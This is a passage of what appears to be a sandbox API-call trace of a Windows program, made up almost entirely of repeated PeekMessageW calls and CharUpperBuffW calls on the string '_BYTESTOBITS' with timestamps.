lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.366] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.367] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.371] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.400] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.400] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.400] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.400] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.400] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.400] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.401] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.401] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.401] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.401] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.401] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.401] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.402] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.402] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.402] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.402] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.402] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.402] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.402] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.403] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.403] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.403] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.403] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.403] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.403] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.403] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.404] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.404] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.404] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.404] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.404] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.404] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.404] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.404] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.405] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.405] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.405] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.405] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.405] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.405] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.405] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.405] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.406] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.406] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.406] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.406] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.406] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.406] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.406] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.406] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.407] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.407] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.407] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.407] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.407] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.407] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.407] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.407] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.408] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.408] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.408] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.408] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.408] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.408] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.411] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.411] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.411] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.411] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.411] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.411] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.412] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.412] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.412] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.412] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.412] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.412] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.412] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.412] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.413] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.413] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.413] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.413] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.413] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.413] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.413] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.413] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.414] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.414] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.414] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.414] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.414] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.414] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.414] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.415] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.415] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.415] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.415] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.415] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.415] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.415] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.415] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.416] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.416] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.416] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.416] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.416] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.416] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.416] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.416] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.417] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.417] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.417] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.418] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.418] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.418] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.418] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.419] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.419] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.419] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.419] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.419] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.419] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.419] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.419] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.420] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.420] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.420] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.420] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.420] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.420] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.420] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.420] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.421] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.421] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.421] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.421] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.421] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.421] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.421] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.422] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.422] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.422] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.422] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.422] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.422] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.422] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.422] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.423] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.423] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.423] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.423] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.423] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.423] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.423] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.424] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.424] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.424] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.424] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.424] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.424] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.424] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.424] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.425] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.425] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.425] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.425] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.425] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.425] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.425] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.425] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.426] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.426] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.426] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.426] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.426] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.426] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.426] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.426] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.427] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.427] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.427] CharUpperBuffW (in: 